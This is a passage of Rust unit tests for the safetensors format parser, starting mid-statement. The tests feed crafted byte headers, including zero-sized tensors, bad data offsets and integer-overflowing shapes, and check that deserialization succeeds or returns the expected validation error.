serialized = b"\x06\x00\x00\x00\x00\x00\x00\x00{}\x0D\x20\x09\x0A"; let loaded = SafeTensors::deserialize(serialized).unwrap(); assert_eq!(loaded.len(), 0); } // Reserver for 0.4.0 // #[test] // /// Test that the JSON header must begin with a `{` character. // fn test_whitespace_start_padded_header_is_not_allowed() { // let serialized = b"\x06\x00\x00\x00\x00\x00\x00\x00\x09\x0A{}\x0D\x20"; // match SafeTensors::deserialize(serialized) { // Err(SafeTensorError::InvalidHeaderStart) => { // // Correct error // } // _ => panic!("This should not be able to be deserialized"), // } // } #[test] fn test_zero_sized_tensor() { let serialized = b"<\x00\x00\x00\x00\x00\x00\x00{\"test\":{\"dtype\":\"I32\",\"shape\":[2,0],\"data_offsets\":[0, 0]}}"; let loaded = SafeTensors::deserialize(serialized).unwrap(); assert_eq!(loaded.names(), vec!["test"]); let tensor = loaded.tensor("test").unwrap(); assert_eq!(tensor.shape(), vec![2, 0]); assert_eq!(tensor.dtype(), Dtype::I32); assert_eq!(tensor.data(), b""); } #[test] fn test_invalid_info() { let serialized = b"<\x00\x00\x00\x00\x00\x00\x00{\"test\":{\"dtype\":\"I32\",\"shape\":[2,2],\"data_offsets\":[0, 4]}}"; match SafeTensors::deserialize(serialized) { Err(SafeTensorError::TensorInvalidInfo) => { // Yes we have the correct error } _ => panic!("This should not be able to be deserialized"), } } #[test] fn test_validation_overflow() { // u64::MAX = 18_446_744_073_709_551_615u64 // Overflow the shape calculation. 
let serialized = b"O\x00\x00\x00\x00\x00\x00\x00{\"test\":{\"dtype\":\"I32\",\"shape\":[2,18446744073709551614],\"data_offsets\":[0,16]}}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; match SafeTensors::deserialize(serialized) { Err(SafeTensorError::ValidationOverflow) => { // Yes we have the correct error } _ => panic!("This should not be able to be deserialized"), } // u64::MAX = 18_446_744_073_709_551_615u64 // Overflow the num_elements * total shape. let serialized = b"N\x00\x00\x00\x00\x00\x00\x00{\"test\":{\"dtype\":\"I32\",\"shape\":[2,9223372036854775807],\"data_offsets\":[0,16]}}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; match SafeTensors::deserialize(serialized) { Err(SafeTensorError::ValidationOverflow) => { // Yes we have the correct error } _ => panic!("This should not be able to be deserialized"), } } }